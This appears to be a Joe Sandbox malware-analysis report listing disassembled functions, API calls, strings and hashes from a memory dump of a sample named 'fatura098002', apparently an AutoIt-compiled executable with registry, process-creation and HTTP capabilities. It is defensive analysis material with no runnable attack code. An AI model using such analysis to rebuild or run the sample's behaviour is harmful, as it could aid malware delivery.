String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 1103490817-4258414348
Opcode ID: b2cefc94b5e3fead4aefa9831905a69c6d8c3f383c7e9bcdfc30c990dc94f4bb
Instruction ID: a7aeb6b57f085edb2333c4e7aa07370ec40556c8e38c13d86a17d903e1c66690
Opcode Fuzzy Hash: b2cefc94b5e3fead4aefa9831905a69c6d8c3f383c7e9bcdfc30c990dc94f4bb
Instruction Fuzzy Hash: DFE18A71218701DFCB14DF24D45496AB7E1FF98314B14895CF8969B3A2DB38ED85CB81

Function 0078C998 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 242COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,0078B6AE,?,?), ref: 0078C9B5
_wcslen.LIBCMT ref: 0078C9F1
_wcslen.LIBCMT ref: 0078CA68
_wcslen.LIBCMT ref: 0078CA9E
_wcslen.LIBCMT ref: 0078CAF9
_wcslen.LIBCMT ref: 0078CB2F
_wcslen.LIBCMT ref: 0078CB7F

Strings

HKU, xrefs: 0078CBF0
HKLM, xrefs: 0078CA98, 0078CA9D
HKEY_CLASSES_ROOT, xrefs: 0078CAF3, 0078CAF8
HKEY_CURRENT_CONFIG, xrefs: 0078CB79, 0078CB7E
HKCC, xrefs: 0078CBAC
HKCR, xrefs: 0078CB29, 0078CB2E
HKEY_CURRENT_USER, xrefs: 0078CBBD
HKCU, xrefs: 0078CBCE
HKEY_USERS, xrefs: 0078CBDF
HKEY_LOCAL_MACHINE, xrefs: 0078CA62, 0078CA67

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 1256254125-909552448
Opcode ID: 969fa8f2712e809b5b0c6a771f2c61d713755ad84d951cb3b3846083999ac3c1
Instruction ID: 7b817385b0111f706bf6c26118faddc82834ab6e5a862cc609ca775f4b1dffbe
Opcode Fuzzy Hash: 969fa8f2712e809b5b0c6a771f2c61d713755ad84d951cb3b3846083999ac3c1
Instruction Fuzzy Hash: CF71293264052A8BCB16FE7CCC41ABB3791AB60750F144129F865A7284EA3DDD44C7B1

Function 0079833C Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 196windowlibraryCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0079835A
_wcslen.LIBCMT ref: 0079836E
_wcslen.LIBCMT ref: 00798391
_wcslen.LIBCMT ref: 007983B4
LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 007983F2
LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00795BF2), ref: 0079844E
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00798487
LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 007984CA
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00798501
FreeLibrary.KERNEL32(?), ref: 0079850D
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0079851D
DestroyCursor.USER32(?), ref: 0079852C
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00798549
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00798555

Strings

.icl, xrefs: 00798368
.dll, xrefs: 007983AB
.exe, xrefs: 00798388

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: Load$Image_wcslen$LibraryMessageSend$CursorDestroyExtractFreeIcon
String ID: .dll$.exe$.icl
API String ID: 391920613-1154884017
Opcode ID: 214a64a0ee74cda872ac566c398c91c298e6acb0f1d848fe67dfd3057cba2484
Instruction ID: 377abc107c88cf23693651df3234777be255af48fe5491bd2569504681501686
Opcode Fuzzy Hash: 214a64a0ee74cda872ac566c398c91c298e6acb0f1d848fe67dfd3057cba2484
Instruction Fuzzy Hash: 7761CF71540215FBEF14DF64EC45BBE77A8BF09721F10860AF815E61D1DB78AA90CBA0

Function 00707778 Relevance: 28.3, APIs: 1, Strings: 15, Instructions: 273COMMON

Download Yara Rule

Strings

Bad directive syntax error, xrefs: 0074519A
#comments-end, xrefs: 007078D9
#cs, xrefs: 00707873, 007078C5
Cannot parse #include, xrefs: 00745279
#pragma compile, xrefs: 007077D3
#notrayicon, xrefs: 007077E7
", xrefs: 00745153
', xrefs: 00745169
#OnAutoItStartRegister, xrefs: 00707817
#include-once, xrefs: 0070782F
Unterminated group of comments, xrefs: 0074528C
#ce, xrefs: 007078ED
#requireadmin, xrefs: 007077FF
#include, xrefs: 00707847
#comments-start, xrefs: 0070785F, 007078B1

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID:
String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 0-1645009161
Opcode ID: ab09c1b492e1ca36a13e2ea45af1acd78eeccf0cff7bda78eb1020583ecab221
Instruction ID: 9639fc9b08111e2fd704a1d1e68f8fb2d6024a6e5ce2196a7932c69dfd093a8b
Opcode Fuzzy Hash: ab09c1b492e1ca36a13e2ea45af1acd78eeccf0cff7bda78eb1020583ecab221
Instruction Fuzzy Hash: 288111B1A04205FBDF24AF60DC46FAE3BA8AF55340F044125F905AA1D2EB7DEA41C7A1

Function 00765A1B Relevance: 27.2, APIs: 18, Instructions: 198windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000063), ref: 00765A2E
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00765A40
SetWindowTextW.USER32(?,?), ref: 00765A57
GetDlgItem.USER32(?,000003EA), ref: 00765A6C
SetWindowTextW.USER32(00000000,?), ref: 00765A72
GetDlgItem.USER32(?,000003E9), ref: 00765A82
SetWindowTextW.USER32(00000000,?), ref: 00765A88
SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00765AA9
SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00765AC3
GetWindowRect.USER32(?,?), ref: 00765ACC
_wcslen.LIBCMT ref: 00765B33
SetWindowTextW.USER32(?,?), ref: 00765B6F
GetDesktopWindow.USER32 ref: 00765B75
GetWindowRect.USER32(00000000), ref: 00765B7C
MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00765BD3
GetClientRect.USER32(?,?), ref: 00765BE0
PostMessageW.USER32(?,00000005,00000000,?), ref: 00765C05
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00765C2F

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
String ID:
API String ID: 895679908-0
Opcode ID: edb801e60024899aec1a5db56d25cf7943e4f89c5a689f0d392b5b4e63424c74
Instruction ID: ec96d7c2ced9675beb9b0a9c41ade889ea83d658d497777402e26ecce7137790
Opcode Fuzzy Hash: edb801e60024899aec1a5db56d25cf7943e4f89c5a689f0d392b5b4e63424c74
Instruction Fuzzy Hash: A5718C71900B09EFDB21DFA8CE85AAEBBF5FF48704F104619E587A25A0D778E940DB14

Function 007630F7 Relevance: 26.6, APIs: 8, Strings: 7, Instructions: 400COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0076318D
_wcslen.LIBCMT ref: 007631F8

Strings

[|, xrefs: 0076339A
REGEXPCLASS, xrefs: 00763255, 00763266
CLASSNN, xrefs: 007631F3, 00763204
INSTANCE, xrefs: 00763453
CLASS, xrefs: 00763188, 007631A5
NAME, xrefs: 00763335, 00763346
TEXT, xrefs: 0076347C

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: _wcslen
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT$[|
API String ID: 176396367-3113052777
Opcode ID: a9501efd0677c4ee0213b0b621da5163a24f1741077cd5dede02bb61bbd29580
Instruction ID: 6f308500ed5af7f417c5b6651c1a763610fddef929650520cbcc5cb668a59e29
Opcode Fuzzy Hash: a9501efd0677c4ee0213b0b621da5163a24f1741077cd5dede02bb61bbd29580
Instruction Fuzzy Hash: 58E1A432A00526EBCB189F78C455BEDFBB4BF54710F54822DE857A7281DB38AE85C790

Function 007200C6 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON

Download Yara Rule

APIs

__scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 007200C6

Part of subcall function 007200ED: InitializeCriticalSectionAndSpinCount.KERNEL32(007D070C,00000FA0,D75FEFBC,?,?,?,?,007423B3,000000FF), ref: 0072011C
Part of subcall function 007200ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,007423B3,000000FF), ref: 00720127
Part of subcall function 007200ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,007423B3,000000FF), ref: 00720138
Part of subcall function 007200ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 0072014E
Part of subcall function 007200ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 0072015C
Part of subcall function 007200ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 0072016A
Part of subcall function 007200ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00720195
Part of subcall function 007200ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 007201A0

___scrt_fastfail.LIBCMT ref: 007200E7

Part of subcall function 007200A3: __onexit.LIBCMT ref: 007200A9

Strings

kernel32.dll, xrefs: 00720133
SleepConditionVariableCS, xrefs: 00720154
api-ms-win-core-synch-l1-2-0.dll, xrefs: 00720122
WakeAllConditionVariable, xrefs: 00720162
InitializeConditionVariable, xrefs: 00720148

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
API String ID: 66158676-1714406822
Opcode ID: 94ec2cfd58d4b83a5535e6675417634012afaf23824690d9b7f2c7e096474986
Instruction ID: 3886bbd3b403c4c8c0cef0958bf1f4e31fb5346db007a98fa76b5f10f84d0388
Opcode Fuzzy Hash: 94ec2cfd58d4b83a5535e6675417634012afaf23824690d9b7f2c7e096474986
Instruction Fuzzy Hash: 4621F9B2645724ABEF115B74BC0AB6E33A4DB05B61F00412BF801E62D2DB7C98108AE8

Function 007744C0 Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 309COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(00000000,00000000,0079CC08), ref: 00774527
_wcslen.LIBCMT ref: 0077453B
_wcslen.LIBCMT ref: 00774599
_wcslen.LIBCMT ref: 007745F4
_wcslen.LIBCMT ref: 0077463F
_wcslen.LIBCMT ref: 007746A7

Part of subcall function 0071F9F2: _wcslen.LIBCMT ref: 0071F9FD

GetDriveTypeW.KERNEL32(?,007C6BF0,00000061), ref: 00774743

Strings

fixed, xrefs: 00774635, 0077463A
removable, xrefs: 007745EA, 007745EF
cdrom, xrefs: 0077458F, 00774594
unknown, xrefs: 00774708
ramdisk, xrefs: 007746F1
network, xrefs: 0077469D, 007746A2
all, xrefs: 00774531, 00774536

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: _wcslen$BuffCharDriveLowerType
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2055661098-1000479233
Opcode ID: 0865baa765f844412be891aded677796bf74a2d14332bf5c16ba8b69efed0423
Instruction ID: d54de49e7fd6d2a6e3326a99ea7738f587d7b4892a7ed8f05afb05ceb46a1be6
Opcode Fuzzy Hash: 0865baa765f844412be891aded677796bf74a2d14332bf5c16ba8b69efed0423
Instruction Fuzzy Hash: 10B1F571608302DFCB14DF28C894A6AB7E5BF957A0F508A1DF49AC7291D738DD44CB92

Function 0078AFF9 Relevance: 24.4, APIs: 16, Instructions: 418processCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0078B198
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0078B1B0
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0078B1D4
_wcslen.LIBCMT ref: 0078B200
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0078B214
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0078B236
_wcslen.LIBCMT ref: 0078B332

Part of subcall function 007705A7: GetStdHandle.KERNEL32(000000F6), ref: 007705C6

_wcslen.LIBCMT ref: 0078B34B
_wcslen.LIBCMT ref: 0078B366
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0078B3B6
GetLastError.KERNEL32(00000000), ref: 0078B407
CloseHandle.KERNEL32(?), ref: 0078B439
CloseHandle.KERNEL32(00000000), ref: 0078B44A
CloseHandle.KERNEL32(00000000), ref: 0078B45C
CloseHandle.KERNEL32(00000000), ref: 0078B46E
CloseHandle.KERNEL32(?), ref: 0078B4E3

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
String ID:
API String ID: 2178637699-0
Opcode ID: 521d002aae090764f77111131c2ffe1dc6a1208fbf0518657717c88cabd0b0dd
Instruction ID: 7470f8141705f2fb7a46a0a2be684f1efc459676f89c690714f24b9474647ef0
Opcode Fuzzy Hash: 521d002aae090764f77111131c2ffe1dc6a1208fbf0518657717c88cabd0b0dd
Instruction Fuzzy Hash: 94F19C31608340DFCB14EF24C895B6EBBE5AF85314F18855DF8999B2A2CB39EC45CB52

Function 0070326F Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 214windowCOMMON

Download Yara Rule

APIs

GetMenuItemCount.USER32(007D1990), ref: 00742F8D
GetMenuItemCount.USER32(007D1990), ref: 0074303D
GetCursorPos.USER32(?), ref: 00743081
SetForegroundWindow.USER32(00000000), ref: 0074308A
TrackPopupMenuEx.USER32(007D1990,00000000,?,00000000,00000000,00000000), ref: 0074309D
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 007430A9

Strings

0, xrefs: 0070327D

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
String ID: 0
API String ID: 36266755-4108050209
Opcode ID: d4d415eb7e881549eb0b5a9346c277b3f249248a7d94180183b649239a77cad0
Instruction ID: 1e8243fcb240387636556c92daba3e0b8b03affd4b1dbaf9f87defab7c7f8970
Opcode Fuzzy Hash: d4d415eb7e881549eb0b5a9346c277b3f249248a7d94180183b649239a77cad0
Instruction Fuzzy Hash: F7712931640215FFEB218F24CC49FAABFA9FF05324F204206F529A61E1C7B9A965C750

Function 00796CD9 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 194windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?), ref: 00796DEB

Part of subcall function 00706B57: _wcslen.LIBCMT ref: 00706B6A

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00796E5F
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00796E81
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00796E94
DestroyWindow.USER32(?), ref: 00796EB5
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00700000,00000000), ref: 00796EE4
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00796EFD
GetDesktopWindow.USER32 ref: 00796F16
GetWindowRect.USER32(00000000), ref: 00796F1D
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00796F35
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00796F4D

Part of subcall function 00719944: GetWindowLongW.USER32(?,000000EB), ref: 00719952

Strings

tooltips_class32, xrefs: 00796E58, 00796EDD
0, xrefs: 00796D98

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
String ID: 0$tooltips_class32
API String ID: 2429346358-3619404913
Opcode ID: b45aa606acac7e3a252b9320791398d04348a04808b1fde4f534798ce7c57160
Instruction ID: 1572c0ef118eb5a285e53ef361a54d8370cce0199a4ec013bb63fcfcbf5c1183
Opcode Fuzzy Hash: b45aa606acac7e3a252b9320791398d04348a04808b1fde4f534798ce7c57160
Instruction Fuzzy Hash: CE7167B0104240AFDB21CF18E858FBABBF9FB89304F44465EF98997261C778E906CB15

Function 0077C476 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0077C4B0
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0077C4C3
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0077C4D7
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0077C4F0
InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 0077C533
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0077C549
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0077C554
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0077C584
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0077C5DC
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0077C5F0
InternetCloseHandle.WININET(00000000), ref: 0077C5FB

Strings

, xrefs: 0077C575

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
String ID:
API String ID: 3800310941-3916222277
Opcode ID: 19425f8b0a1f7e432b25c5353f64a1ba555c62f88a8478d5aa838ca957ba3ed0
Instruction ID: d1b05852f069b79d8451eff984867a62f3351fae221299eba7f4709a6c118e18
Opcode Fuzzy Hash: 19425f8b0a1f7e432b25c5353f64a1ba555c62f88a8478d5aa838ca957ba3ed0
Instruction Fuzzy Hash: 8C514DB1500604BFDF228FA0C988AAB7BBCFF08794F10841EF94996210DB39E9559B60

Function 0079856F Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00000000,?,000000EC), ref: 00798592
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 007985A2
